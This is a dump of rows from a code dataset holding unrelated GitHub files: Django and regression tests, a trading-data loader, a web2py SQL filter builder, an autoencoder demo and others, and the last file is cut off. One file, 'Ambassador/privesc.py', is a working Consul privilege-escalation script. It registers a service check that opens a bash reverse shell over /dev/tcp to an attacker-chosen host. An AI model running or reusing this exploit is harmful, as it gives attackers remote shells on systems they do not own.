seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
2403860193 | from decimal import Decimal
from django.test import TestCase
from parameterized import parameterized
from calculator.calculation import calculate_total_cost
from calculator.exceptions import StateNotFound
from calculator.repository import Repository
from calculator.tests.common import fill_db
class CalculateTotalCostTestCase(TestCase):
"""Тесты на calculate_total_cost."""
def setUp(self):
"""Настройка тестов."""
fill_db()
@parameterized.expand(
[
(Decimal(1), 1, 'UT', Decimal('1.0685')),
(Decimal(1000), 1, 'NV', Decimal('1047.6')),
(Decimal(1), 1000, 'TX', Decimal('1030.625')),
(Decimal(200), 100, 'AL', Decimal('18720')),
(Decimal('123.33'), 175, 'CA', Decimal('21026.9941875')),
],
)
def test_calculate_total_cost(self, price, quantity, state_code, expected):
"""Проверка успешных расчётов calculate_total_cost."""
repository = Repository()
self.assertEqual(
calculate_total_cost(
price=price,
quantity=quantity,
state_code=state_code,
repository=repository,
),
expected,
)
def test_bad_state_code(self):
"""Проверка неверного кода штата."""
repository = Repository()
with self.assertRaises(StateNotFound):
calculate_total_cost(
price=Decimal('11.33'),
quantity=12,
state_code='WRONG',
repository=repository,
)
| SpiritD/tax_calculator | tom_project/calculator/tests/total_costs.py | total_costs.py | py | 1,659 | python | en | code | 0 | github-code | 36 |
37402409097 | from regression_tests import *
class Test(Test):
settings=TestSettings(
tool='fileinfo',
args='--json --verbose',
input='564ee59caad056d98ed274c8c4f06e82'
)
def test_fileinfo_succeeded(self):
assert self.fileinfo.succeeded
assert 'importTable' not in self.fileinfo.output
| avast/retdec-regression-tests | tools/fileinfo/bugs/macho-bad-alloc-2/test.py | test.py | py | 326 | python | en | code | 11 | github-code | 36 |
16442682460 | class Student:
def __init__(self, id, fullname, birthdate, sex, address, phone, email):
self._id = id
self._fullname = fullname
self._birthdate = birthdate
self._sex = sex
self._address = address
self._phone = phone
self._email = email
| thanhtugn/python_core_thanhtugn | Big_assignment_01/student.py | student.py | py | 302 | python | en | code | 1 | github-code | 36 |
35104869337 | # -*- coding: utf-8 -*-
import os
import codecs
import collections
from six.moves import cPickle
import numpy as np
import re
import itertools
import pandas as pd
from ts_FeatureCoding import Feature_Coding
DATA_DIR = "data/events"
class DataLoader():
def __init__(self, args):
self.data_dir = args.data_dir
self.data_file = args.data_file
self.batch_size = args.batch_size
self.seq_length = args.seq_length
self.max_records = args.max_records
self.encoding=args.input_encoding
self.featureCodes = Feature_Coding()
self.nfeatures = self.featureCodes.nfeatures
input_file = os.path.join(self.data_dir, self.data_file)
print("reading text file")
self.loadcsv(input_file)
def preparedata(self):
vocab_file = os.path.join(self.data_dir, "vocab.pkl")
tensor_file = os.path.join(self.data_dir, "data.npy")
# Let's not read vocab and data from file. We may change them.
if True or not (os.path.exists(vocab_file) and os.path.exists(tensor_file)):
print("building vocabulary files...")
self.preprocess(vocab_file, tensor_file, self.encoding)
else:
print("loading preprocessed files...")
self.load_preprocessed(vocab_file, tensor_file)
self.create_batches()
self.reset_batch_pointer()
def clean_str(self, string):
"""
Tokenization/string cleaning for all datasets except for SST.
Original taken from https://github.com/yoonkim/CNN_sentence/blob/master/process_data
"""
#string = re.sub(r"_", " Period_", string)
string = re.sub(r",", "_", string)
string = re.sub(r"VS_15,Neutral", "\.", string)
return string
#string = re.sub(r"[^가-힣A-Za-z0-9(),!?\'\`]", " ", string)
#string = re.sub(r"\'s", " \'s", string)
#string = re.sub(r"\'ve", " \'ve", string)
#string = re.sub(r"n\'t", " n\'t", string)
#string = re.sub(r"\'re", " \'re", string)
#string = re.sub(r"\'d", " \'d", string)
#string = re.sub(r"\'ll", " \'ll", string)
#string = re.sub(r"!", " ! ", string)
#string = re.sub(r"\(", " \( ", string)
#string = re.sub(r"\)", " \) ", string)
#string = re.sub(r"\?", " \? ", string)
#string = re.sub(r"\s{2,}", " ", string)
#return string.strip().lower()
def build_vocab(self, sentences):
"""
Builds a vocabulary mapping from word to index based on the sentences.
Returns vocabulary mapping and inverse vocabulary mapping.
"""
# Build vocabulary
word_counts = collections.Counter(sentences)
# Mapping from index to word
vocabulary_inv = [x[0] for x in word_counts.most_common()]
vocabulary_inv = list(sorted(vocabulary_inv))
# Mapping from word to index
vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}
return [vocabulary, vocabulary_inv]
def loadcsv(self, input_file):
columns= self.featureCodes.featuresAll
nread = 100000
skip_rows = 0
max_records = self.max_records
self.raw_df = pd.DataFrame(columns=columns)
reader = pd.read_csv(input_file, iterator=True, chunksize=nread,
header=0, names=columns, index_col=False,
na_values='NA', skip_blank_lines=True,
skipinitialspace=True, infer_datetime_format=False,
parse_dates=False, skiprows=skip_rows)
do_more = True
total_read = 0
dailyRowSeen = False
for csvrows in reader:
if csvrows.shape[0] == 0:
doMore = False
break
# convert TimeStamp column to a datatime
csvrows['TimeStamp'] = pd.to_datetime(csvrows['TimeStamp'], format='%Y/%m/%dT%H:%M:%S')
# raw_df = raw_df.append(csvrows, ignore_index=True)
self.raw_df = pd.concat([self.raw_df, csvrows], axis=0, copy=False, ignore_index=True)
skip_rows += nread
total_read += nread
print('Records read:', total_read, self.raw_df.shape)
if max_records > 0 and total_read >= max_records:
doMore = False
break
print('Total Records read:', total_read, ' Saved:', self.raw_df.shape)
self.raw_df.columns = columns
self.raw_df.set_index('TimeStamp')
"""
# extract the event TypeCode
self.raw_df['TypeCode'] = self.raw_df['Type'].str.split('_').str[0]
# extract the Direction code
self.raw_df['Dir'] = self.raw_df['TypeCode'].str[-1:]
self.raw_df['Period'] = self.raw_df['Type'].str.split('_').str[1]
# map the Period (D,60,15,5,1) to int PeriodCode (1440,60,15,5,1)
try:
self.raw_df['TypeCodeNum'] = self.raw_df['TypeCode'].map(self.featureCodes.eventCodeDict).astype('int32')
self.raw_df['PeriodCode'] = self.raw_df['Period'].map(self.featureCodes.periodCodeDict).astype('int32')
except RuntimeError as e:
print( e.args)
"""
print('Checking for Nan rows...')
nandf = self.raw_df[self.raw_df.isnull().any(axis=1)]
if not nandf.empty:
print(nandf)
# For VS events, set direction code to X, since the direction is unknown
#self.raw_df.Dir[self.raw_df[self.raw_df.TypeCode == 'VS'].index] = 'X'
# drop rows with unwanted type codes (HEARTB)
print('Pruning unwanted event types...')
self.raw_df = self.raw_df.drop(self.raw_df[self.raw_df.EventCode == 'HEARTB'].index)
self.raw_df = self.raw_df.drop(self.raw_df[self.raw_df.EventCode == 'VSX'].index)
self.raw_df.reset_index()
print('Total Records after pruning:', self.raw_df.shape)
categ_features = pd.get_dummies(self.raw_df[['PeriodCode', 'EventDir', 'MarketTrend_D', 'MarketTrend_60', 'MarketTrend_15', 'MarketTrend_5', 'MarketTrend_1']], drop_first=False)
self.data = pd.concat([self.raw_df.Type, categ_features], axis=1)
#self.data = self.raw_df[['Type']]
#self.data = np.array(self.raw_df.Type)
#self.data['X'] = '{' + self.data['PeriodCode'] + ' ' + self.data['Dir'] + ' ' + self.data['TypeCode'] + '}'
#labels = dftrim['Dir'] + '_' + dftrim['Period']
self.labels = self.data.Type[1:]
self.data = self.data[:-1]
#all_data = pd.concat([data, labels], axis=0)
#self.data.reset_index()
self.nfeatures = self.data.shape[1]
# scan for first row containing 'HIL*D' event code
for idx in range(len(self.raw_df)):
t = self.raw_df.Type.iloc[idx]
mf = re.match(r'HILMF..D', t)
ft = re.match(r'HILFT..D', t)
if mf or ft:
print('Found ', t, ' at index', idx)
self.data=self.data[idx:]
self.labels = self.labels[idx:]
break
def preprocess(self, vocab_file, tensor_file, encoding):
#X = '[ ' + self.data.PeriodCode.astype(str) + ' ' + self.data.Dir + ' ' + self.data.TypeCode + ' ]'
# save the data in a numpy file
#self.tensor = np.array(self.data)
#self.label_tensor = np.array(self.labels)
#np.save(tensor_file, self.tensor)
#self.vocab_size = len(self.featureCodes.eventCodeDict)
self.vocab, self.words = self.build_vocab(self.data.Type)
self.vocab_size = len(self.words)
with open(vocab_file, 'wb') as f:
cPickle.dump(self.words, f)
#The same operation like this [self.vocab[word] for word in x_text]
# index of words as our basic data
self.data['Type'] = np.array(list(map(self.vocab.get, self.data.Type)))
self.tensor = np.array(self.data)
self.label_tensor = np.array(list(map(self.vocab.get, self.labels)))
# Save the data to data.npy
np.save(tensor_file, self.tensor)
def load_preprocessed(self, vocab_file, tensor_file):
with open(vocab_file, 'rb') as f:
self.words = cPickle.load(f)
self.vocab_size = len(self.words)
self.vocab = dict(zip(self.words, range(len(self.words))))
self.tensor = np.load(tensor_file)
self.num_batches = int(self.tensor.size / (self.batch_size *
self.seq_length))
def create_batches(self):
self.num_batches = int(self.tensor.shape[0] / (self.batch_size * self.seq_length))
if self.num_batches == 0:
assert False, "Not enough data. Make seq_length and batch_size smaller."
# truncate input tensor shape [n, self.nfeatures] to even number of full batches
self.tensor = self.tensor[:self.num_batches * self.batch_size * self.seq_length]
self.label_tensor = self.label_tensor[:self.num_batches * self.batch_size * self.seq_length]
self.x_batches = np.split(self.tensor.reshape((-1, self.seq_length, self.nfeatures)),
self.num_batches, axis=0)
self.y_batches = np.split(self.label_tensor.reshape(-1, self.seq_length),
self.num_batches, axis=0)
def next_batch(self):
x, y = self.x_batches[self.pointer], self.y_batches[self.pointer]
self.pointer += 1
return x, y
def reset_batch_pointer(self):
self.pointer = 0
| traderscience/market_transformer | tsutils/data_loader.py | data_loader.py | py | 9,544 | python | en | code | 0 | github-code | 36 |
24490960551 | TRUE_VALUES = ('T', 't', "true", "True", True, "yes", "Yes", "YES", "Y", "y")
def q_filter(query=None, svc_field=None, node_field=None, group_field=None,
app_field=None, user_field=None, db=db):
q = None
t = None
if not auth_is_node() and "Manager" in user_groups():
manager = True
else:
manager = False
if svc_field:
if auth_is_svc():
q = svc_field == auth.user.svc_id
elif auth_is_node():
node_svc_ids = [r.svc_id for r in db(db.svcmon.node_id==auth.user.node_id).select()]
app = db(db.nodes.node_id==auth.user.node_id).select().first().app
node_svc_ids += [r.svc_id for r in db((db.svcmon.mon_vmname==auth.user.nodename)&(db.services.svc_app==app)&(db.svcmon.svc_id==db.services.svc_id)).select(db.services.svc_id)]
q = svc_field.belongs(node_svc_ids)
elif not manager:
q = svc_field.belongs(user_published_services())
if t is None:
t = db[svc_field.tablename]
elif node_field:
if auth_is_node():
q = node_field == auth.user.node_id
elif not manager:
q = node_field.belongs(user_published_nodes())
if t is None:
t = db[node_field.tablename]
elif app_field:
if auth_is_node():
node_apps = node_responsibles_apps(auth.user.node_id)
q = app_field.belongs(node_apps)
elif not manager:
q = app_field.belongs(user_published_apps())
if t is None:
t = db[app_field.tablename]
if group_field:
if auth_is_node() or auth_is_svc():
pass
elif not manager:
q = group_field.belongs(user_groups())
if t is None:
t = db[group_field.tablename]
if user_field:
if auth_is_node() or auth_is_svc():
pass
elif not manager:
q = user_field.belongs(user_groups_user_ids())
if t is None:
t = db[user_field.tablename]
if query is None:
if q is None:
return t.id > 0
else:
return q
else:
if q is None:
return query
else:
return query & q
def where_json_chunk(table, field, chunk, db):
q = None
m = re.match("([\w\.$\[\*#\]]*)(>=|<=|[=><])(.*)", chunk)
if m:
key, op, val = m.groups()
try:
int(val)
except ValueError:
val = "'%s'"%val
if "[#]" in key:
q = (db[table][field] != None) & "JSON_LENGTH(%s.%s, '%s')%s%s" % (table, field, key.replace("[#]",""), op, val)
else:
q = (db[table][field] != None) & "JSON_VALUE(%s.%s, '%s')%s%s" % (table, field, key, op, val)
elif ":has:" in chunk:
m = re.match("([\w\.$]*)(:has:)(.*)", chunk)
key, op, val = m.groups()
try:
int(val)
except ValueError:
val = "'%s'"%val
q = (db[table][field] != None) & "NOT JSON_SEARCH(%s.%s, 'one', %s, NULL, '%s') is NULL" % (table, field, val, key)
elif ":sub:" in chunk:
m = re.match("([\w\.$]*)(:sub:)(.*)", chunk)
key, op, val = m.groups()
q = (db[table][field] != None) & "JSON_VALUE(%s.%s, '%s') LIKE '%%%s%%'" % (table, field, key, val)
elif ":end:" in chunk:
m = re.match("([\w\.$]*)(:end:)(.*)", chunk)
key, op, val = m.groups()
q = (db[table][field] != None) & "JSON_VALUE(%s.%s, '%s') LIKE '%%%s'" % (table, field, key, val)
elif ":start:" in chunk:
m = re.match("([\w\.$]*)(:start:)(.*)", chunk)
key, op, val = m.groups()
q = (db[table][field] != None) & "JSON_VALUE(%s.%s, '%s') LIKE '%s%%'" % (table, field, key, val)
return q
def _where(query, table, var, field, depth=0, db=db):
if table not in db:
return query
if field not in db[table]:
return query
if depth == 0 and var and len(var) > 0 and var[0] == "|":
var = var[1:]
if query is None:
query = (db[table].id >= 0)
if var is None:
return query
if len(var) == 0:
return query
if var == "%":
return query
if '&' in var and '|' in var:
"""don't even try to guess order
"""
return query
done = False
if var[0] == '|':
_or=True
var = var[1:]
elif var[0] == '&':
_or=False
var = var[1:]
else:
_or=False
if '&' in var:
i = var.index('&')
chunk = var[:i]
var = var[i:]
elif '|' in var:
i = var.index('|')
chunk = var[:i]
var = var[i:]
else:
done = True
chunk = var
if len(chunk) == 0:
return query
if chunk[0] == '!':
_not = True
chunk = chunk[1:]
else:
_not = False
if len(chunk) == 0:
return query
# initialize a restrictive filter
q = db[table].id < 0
if chunk[0] == "$":
_q = where_json_chunk(table, field, chunk, db)
if _q:
q = _q
elif chunk in ('empty', '=empty'):
if db[table][field].type == "string":
q = (db[table][field]==None)|(db[table][field]=='')
else:
q = db[table][field]==None
elif chunk[0] == '(' and chunk[-1] == ')' and len(chunk) > 2:
chunk = chunk[1:-1]
if field not in db[table]:
pass
q = db[table][field].belongs(chunk.split(','))
elif chunk[0] not in '<>=':
if chunk[0] == "~":
chunk = chunk[1:]
if field not in db[table]:
pass
elif db[table][field].type in ('string', 'text', 'date', 'upload'):
if '%' in chunk:
q = db[table][field].like(chunk)
else:
q = db[table][field]==chunk
elif db[table][field].type in ('id', 'integer'):
try:
c = int(chunk)
q = db[table][field]==c
except ValueError:
pass
elif db[table][field].type == 'float':
try:
c = float(chunk)
q = db[table][field]==c
except ValueError:
pass
elif db[table][field].type == 'boolean':
if chunk in TRUE_VALUES:
q = db[table][field]==True
elif chunk == "%":
q = db[table].id >= 0
else:
q = db[table][field]==False
else:
_op = chunk[0]
if len(chunk) == 0:
return query
chunk = chunk[1:]
q = None
if field not in db[table]:
pass
elif db[table][field].type in ('datetime', 'timestamp', 'date'):
chunk = delta_to_date(chunk)
elif db[table][field].type in ('id', 'integer'):
try:
chunk = int(chunk)
except ValueError:
q = db[table].id < 0
if q is None:
if _op == '>':
q = db[table][field]>chunk
elif _op == '<':
q = db[table][field]<chunk
elif _op == '=':
q = db[table][field]==chunk
if _not:
q = ~q
if not done:
q = _where(q, table, var, field, depth=depth+1)
if _or:
return query|q
else:
return query&q
def table_where(query, table, field):
return _where(query,
table.colprops[field].table,
table.filter_parse(field),
table.colprops[field].field if table.colprops[field].filter_redirect is None else table.colprops[field].filter_redirect
)
| opensvc/collector | init/models/where.py | where.py | py | 7,675 | python | en | code | 0 | github-code | 36 |
5468407661 | import os
import numpy as np
import torch
import torchvision
import torch.nn as nn
import torchvision.transforms as transforms
import torch.optim as optim
import matplotlib.pyplot as plt
import torch.nn.functional as F
from torchvision import datasets
from torch.utils.data import DataLoader
from torchvision.utils import save_image
from PIL import Image
import pylab as py
from IPython import embed
from naive_ae import ConvAutoencoder
DATA_PATH = '../data_sets/mnist'
NAIVE_AE_PATH = './trained_models/convAutoEncSigmoid/naive_ae25.pth'
CLEVER_AE_PATH = './trained_models/convAutoEncNoSigmoid/naive_ae25.pth'
def posterior_loss_denoising(I, I_c, AE, sigma, T):
likelihood_term = torch.exp(-torch.norm(I - I_c)) / 2 * (sigma**2)
prior_term = torch.norm(AE(I_c) - I) / T
# print(f'likelyhood_term:{likelihood_term} prior_term:{prior_term}')
# print(f'loss: {-torch.log(likelihood_term)}, { - torch.log(prior_term)}')
return -torch.log(likelihood_term) - torch.log(prior_term)
def maximize_posterior_denoising(I_c, AE, sigma=1, T=0.1):
I_0 = torch.rand(1,1,28, 28, requires_grad=True)
I_i = I_0
optimizer = torch.optim.Adam([I_i], lr=0.1)
for i in range(2000):
loss = posterior_loss_denoising(I_i, I_c, AE, sigma, T)
optimizer.zero_grad()
loss.backward()
optimizer.step()
return I_i
def posterior_loss_mid_suppression(I, I_c, AE, T):
# I = suppress_mid(I)
prior_term = torch.norm(AE(I_c) - I) / T
return - torch.log(prior_term)
def maximize_posterior_mid_suppression(I_c, AE, sigma=1, T=100):
I_0 = torch.rand(1,1,28, 28, requires_grad=True)
I_i = I_0
optimizer = torch.optim.Adam([I_i], lr=0.1)
for i in range(2000):
loss = posterior_loss_mid_suppression(I_i, I_c, AE, T)
optimizer.zero_grad()
loss.backward()
optimizer.step()
return I_i
def gaussian_noise(I):
return I + torch.randn(1,1,28,28)
def suppress_mid(I):
I_c = torch.clone(I)
I_c[:,:,9:18,9:18] = 0
return I_c
naive_ae = ConvAutoencoder()
naive_ae.load_state_dict(torch.load(NAIVE_AE_PATH))
clever_ae = ConvAutoencoder()
clever_ae.load_state_dict(torch.load(CLEVER_AE_PATH))
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))
])
test_set = datasets.MNIST(root=DATA_PATH, train=False, download=True, transform=transform)
############################
# denoising task #
############################
I = test_set[2][0]
I_c = gaussian_noise(I)
naive_denoising = maximize_posterior_denoising(I_c, naive_ae)
clever_denoising = maximize_posterior_denoising(I_c, clever_ae)
fig, ax = plt.subplots(2,2)
fig.suptitle('denoising task')
ax[0,0].imshow(I.squeeze())
ax[0,0].set_title('original image')
ax[0,1].imshow(I_c.squeeze())
ax[0,1].set_title('noised image')
ax[1,0].imshow(naive_denoising.detach().squeeze())
ax[1,0].set_title('naive AE denoising')
ax[1,1].imshow(clever_denoising.detach().squeeze())
ax[1,1].set_title('clever AE denoising')
############################
# inpainting task #
############################
I = test_set[2][0].view(1,1,28,28)
I_c = suppress_mid(I)
naive_inpainting = maximize_posterior_mid_suppression(I_c, naive_ae)
clever_inpainting = maximize_posterior_mid_suppression(I_c, clever_ae)
fig, ax = plt.subplots(2,2)
fig.suptitle('inpainting task')
ax[0,0].imshow(I.squeeze())
ax[0,0].set_title('original image')
ax[0,1].imshow(I_c.squeeze())
ax[0,1].set_title('noised image')
ax[1,0].imshow(naive_inpainting.detach().squeeze())
ax[1,0].set_title('naive AE inpainting')
ax[1,1].imshow(clever_inpainting.detach().squeeze())
ax[1,1].set_title('clever AE inpainting')
plt.show() | MAyaCohenCS/Experimental_CNN_3 | image_posterior.py | image_posterior.py | py | 3,724 | python | en | code | 0 | github-code | 36 |
21056220601 | #!/usr/bin/python3
import requests, argparse
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", "-rh", type=str, help="remote host (if not specified, 127.0.0.1 will be used)", default="127.0.0.1")
parser.add_argument("--rport", "-rp", type=str, help="remote port (if not specified, 8500 will be used)", default="8500")
parser.add_argument("--lhost", "-lh", type=str, help="local host", required=True)
parser.add_argument("--lport", "-lp", type=str, help="local port", required=True)
parser.add_argument("--token", "-tk", type=str, help="acl token", required=True)
parser.add_argument("--ssl", "-s", action="store_true", help="use ssl (https) in the request")
args = parser.parse_args()
if args.ssl:
target = f"https://{args.rhost}:{args.rport}/v1/agent/service/register"
else:
target = f"http://{args.rhost}:{args.rport}/v1/agent/service/register"
headers = {"X-Consul-Token": f"{args.token}"}
json = {"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{args.lhost}/{args.lport} 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80}
try:
requests.put(target, headers=headers, json=json, verify=False)
print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")
except:
print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")
exit(1)
| GatoGamer1155/Scripts | Ambassador/privesc.py | privesc.py | py | 1,409 | python | en | code | 33 | github-code | 36 |
27609918869 | # -*- coding: utf-8 -*-
"""
Created on Thu May 27 19:43:26 2021
@author: estusaee2
"""
"""
i = 1
while i <= 20:
print(i,end=", ")
i = i + 1
"""
decision = 1
while decision == 1 :
decision = int(input("¿Desea terminar el programa\n 1: No \n 2: Si \n\n "))
| Y-Avila/MisionTic-2022 | Ciclo_1(Python)/2Semana/While.py | While.py | py | 282 | python | en | code | 0 | github-code | 36 |
6765119466 | from operator import itemgetter
def carregar(arquivo):
linhas = []
with open(arquivo) as f:
f.readline()
for linha in f.readlines():
data, abertura, alta, baixa, fechamento, volume = linha.strip().split(',')
ano, mes, dia = data.split('-')
linhas.append(
{
"ano": int(ano),
"mes": int(mes),
"dia": int(dia),
"abertura": float(abertura),
"alta": float(alta),
"baixa": float(baixa),
"fechamento": float(fechamento),
"volume": int(volume),
}
)
return linhas
def formatar_data(linha):
meses = (
'janeiro', 'fevereiro', 'março', 'abril', 'maio', 'junho', 'julho', 'agosto', 'setembro', 'outubro', 'novembro',
'dezembro')
d, m, a, = linha['dia'], linha['mes'], linha['ano']
return '{:0>2} de {} de {}'.format(d, meses[m - 1], a)
def menor_fechamento(linha):
ordenado = sorted(linha, key = itemgetter('fechamento'))
return ordenado[0]['fechamento'], formatar_data(ordenado[0])
def main():
nome_arquivo = input()
nome_arquivo = nome_arquivo.replace('\r', '')
arquivo = carregar(nome_arquivo)
fecha, data = menor_fechamento(arquivo)
print(f'O menor preço no fechamento foi {fecha:.2f} em {data}')
if __name__ == '__main__':
main() | Larissapy/aula-remota-12 | s12_t1/t1_q2.py | t1_q2.py | py | 1,453 | python | pt | code | 0 | github-code | 36 |
74004428583 | from flask import Flask, jsonify
from apscheduler.schedulers.background import BackgroundScheduler
app = Flask(__name__)
#Sample data not acurate
cancer_stats = {
'Total_infected': 1000,
'Active_cases': 500,
'Recovered': 400,
'Deaths': 200,
'Critical': 50,
'Mortality_rate': 20,
'deceased': 100,
'Population': 1000000
}
def update_stats():
cancer_stats['Total_infected'] +=10
cancer_stats['Active_cases'] +=10
cancer_stats['Recovered'] +=10
cancer_stats['Deaths'] +=10
cancer_stats['Critical'] +=10
cancer_stats['Mortality_rate'] +=10
cancer_stats['deceased'] +=10
cancer_stats['Population'] +=10
def get_cancer_stats():
return jsonify(cancer_stats)
if __name__ == '__main__':
scheduler = BackgroundScheduler()
scheduler.add_job(update_stats, 'interval', minutes=1)
scheduler.start()
print('Scheduler started')
scheduler.print_jobs()
app.run(debug=True)
| Ceced20/SimpleCancerAPI | API.py | API.py | py | 955 | python | en | code | 0 | github-code | 36 |
6672970825 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""``stsynphot`` configurable items.
The default configuration heavily depends on STScI TRDS structure
but it can be easily re-configured as the user wishes via
`astropy.config`.
``PYSYN_CDBS`` must be a defined system environment variable for
directories to be configured properly. It also overwrites
``synphot`` configurable items.
"""
# STDLIB
import os
# THIRD-PARTY
import numpy as np
from astropy import log
from astropy.config import ConfigNamespace, ConfigItem
# SYNPHOT
from synphot.config import Conf as synconf
from synphot.utils import generate_wavelengths
__all__ = ['conf', 'getref', 'showref', 'overwrite_synphot_config']
class Conf(ConfigNamespace):
"""Configuration parameters."""
# Set up default wavelength
_wave, _wave_str = generate_wavelengths(
minwave=500, maxwave=26000, num=10000, delta=None, log=True,
wave_unit='angstrom')
# Root directory
rootdir = ConfigItem(
os.environ.get('PYSYN_CDBS', '/grp/redcat/trds'),
'TRDS data root directory')
# Graph, optical component, and thermal component tables
graphtable = ConfigItem('mtab$*_tmg.fits', 'Graph table')
comptable = ConfigItem('mtab$*_tmc.fits', 'Component table')
thermtable = ConfigItem('mtab$*_tmt.fits', 'Thermal table')
# Default wavelength in Angstrom and its description
waveset_array = ConfigItem(
_wave.value.tolist(),
'Default wavelength set in Angstrom', 'float_list')
waveset = ConfigItem(_wave_str, 'Default wavelength set description')
# Telescope primary mirror collecting area in cm^2
area = ConfigItem(45238.93416, 'Telescope collecting area in cm^2')
# Common filter name
clear_filter = ConfigItem('clear', 'Name for a clear filter')
# Wavelength catalog file
wavecatfile = ConfigItem(
'synphot$wavecats/wavecat.dat', 'Wavelength catalog file')
# Detector parameters file
detectorfile = ConfigItem(
'synphot$detectors.dat', 'Detector parameters file')
# IRAF shortcuts file for stsynphot.stio.irafconvert()
irafshortcutfile = ConfigItem(
'synphot$irafshortcuts.txt',
'col1=shortcut_name col2=relpath_to_rootdir, has header.')
# Clean up
del _wave
del _wave_str
def _get_synphot_cfgitems():
"""Iterator for ``synphot`` configuration items."""
for c in synconf.__dict__.values():
if isinstance(c, ConfigItem):
yield c
def overwrite_synphot_config(root):
"""Silently overwrite ``synphot`` configurable items to point to
given root directory.
Parameters
----------
root : str
Root directory name.
"""
subdir_keys = ['calspec', 'extinction', 'nonhst']
# Need this for Windows support
if root.startswith(('http', 'ftp')):
sep = '/'
else:
sep = os.sep # Can be / or \
for cfgitem in _get_synphot_cfgitems():
path, fname = os.path.split(cfgitem())
i = np.where(list(map(path.__contains__, subdir_keys)))[0]
if len(i) == 0:
continue
subdir = subdir_keys[i[0]]
if subdir == 'nonhst':
cfgval = sep.join([root, 'comp', subdir, fname])
else:
cfgval = sep.join([root, subdir, fname])
cfgitem.set(cfgval)
conf = Conf()
# Override SYNPHOT configuration
overwrite_synphot_config(conf.rootdir)
def _get_ref_cfgitems():
"""Iterator for configuration items to be displayed."""
from stsynphot.stio import get_latest_file, irafconvert
for cfgitem, do_conv in (
(Conf.graphtable, True),
(Conf.comptable, True),
(Conf.thermtable, True),
(Conf.area, False),
(Conf.waveset, False)):
val = cfgitem()
if do_conv:
val = get_latest_file(irafconvert(val))
yield cfgitem.name, val
def getref():
"""Return current values of select configurable items as a dictionary.
Returns
-------
refdict : dict
"""
return dict([x for x in _get_ref_cfgitems()])
def showref(): # pragma: no cover
"""Show the values of select configurable items."""
info_str = '\n'
for x in _get_ref_cfgitems():
info_str += f'{x[0]:10s}: {x[1]}\n'
log.info(info_str)
| spacetelescope/stsynphot_refactor | stsynphot/config.py | config.py | py | 4,330 | python | en | code | 11 | github-code | 36 |
852394623 | # -*- coding: utf-8 -*-
import requests
import json
import csv
import time
import re
from CrawlClient import Crawler
from lxml import etree
class ZOJCrawler(Crawler.Crawler):
def __init__(self, max_try_cnt, url = 'http://acm.zju.edu.cn/onlinejudge'):
self.try_cnt = 0
self.max_try_cnt = max_try_cnt
self.url = url
self.rows = []
self.try_second = 10
def crawl(self):
print("正在从 ZOJ抓取数据...")
begin_time = time.time()
#print("Vol 66 ".find("Vol 66 "))
volume_cnt = 1
while True:
#Crawler.Crawler.progressbar(volume_cnt, 31)
print("正在抓取ZOJ volume %d .." % volume_cnt)
url = self.url + "/showProblems.do?contestId=1&pageNumber=%d" % volume_cnt
while True:
try:
u = requests.get(url, headers= None)
break
except (requests.exceptions.RequestException, requests.exceptions.ConnectionError):
print("请求失败,%ds 后重试" % self.try_second)
time.sleep(self.try_second)
# with open("column.html", "r", encoding="utf-8") as f:
# data = f.read()
html = etree.HTML(u.text)
vol_id = html.xpath('//*[@id="content_title"]/text()')[0]
if vol_id.find("Vol %d" % volume_cnt) == -1:
break
cnt = 2
while True:
problem = html.xpath('//*[@id="content_body"]/form[1]/table/tr[%d]' % cnt)
if not problem:
break
#print(type(problem[0]))
pro_id = problem[0].xpath("td[1]//font/text()")[0]
pro_title = problem[0].xpath("td[2]//font/text()")[0]
try:
ac_submission = problem[0].xpath("td[3]//a[1]/text()")[0]
all_submission = problem[0].xpath("td[3]//a[2]/text()")[0]
except IndexError:
all_submission = ac_submission
ac_submission = 0
item = []
item.append("ZOJ")
item.append(pro_id)
item.append(pro_title)
item.append("")
item.append("")
item.append(ac_submission)
item.append(all_submission)
self.rows.append(item)
#print(pro_id, pro_title)
cnt = cnt + 1
volume_cnt = volume_cnt + 1
end_time = time.time()
print("抓取完成,耗时" ,time.strftime("%M:%S", time.localtime(end_time - begin_time)))
return True
def save(self, filename):
headers = ["OJ", "Problem Number", "Problem Title", "AC Users", "Try Users", "AC Submission",
"All Submission"]
with open(filename, "wt", encoding="GBK") as f:
f_csv = csv.writer(f, lineterminator='\n')
f_csv.writerow(headers)
f_csv.writerows(self.rows) | deepwzh/OJ-Crawers | CrawlClient/ZOJCrawler.py | ZOJCrawler.py | py | 3,051 | python | en | code | 3 | github-code | 36 |
5491253992 | import torch
import torch.nn.functional as F
import constants
import numpy as np
def gauss1D(window_size, sigma):
center = window_size // 2
gauss = torch.Tensor([np.exp(-(x - center)**2 / (2*(sigma**2))) for x in range(window_size)])
gauss = gauss/gauss.sum()
return gauss
def create_window(window_size, sigma, channels: int = 3):
window1d = gauss1D(window_size, sigma).unsqueeze(1)
window2d = torch.mm(window1d, window1d.t())
window2d = window2d.repeat(channels, 1, 1, 1)
return window2d
def rgb_to_ycbcr(image: torch.Tensor, only_use_y_channel: bool = True) -> torch.Tensor:
"""Convert RGB Image to YCbCr Image
Args:
- image (Tensor): Tensor image shape (B, 3, H, W)
- only_use_y_channel (bool): whether or not extract image with only Y channel.
Returns:
- Tensor image: shape (B, 1, H, W) if only_use_y_channel is True and (B, 3, H, W) the other way.
"""
if not isinstance(image, torch.Tensor) or image.size(-3) != 3:
raise ValueError("Invalid format of image, should be Tensor(B, 3, H, W)")
image = image.to(constants.DEVICE)
if only_use_y_channel:
weight = torch.tensor([[65.481], [128.533], [24.966]]).to(constants.DEVICE)
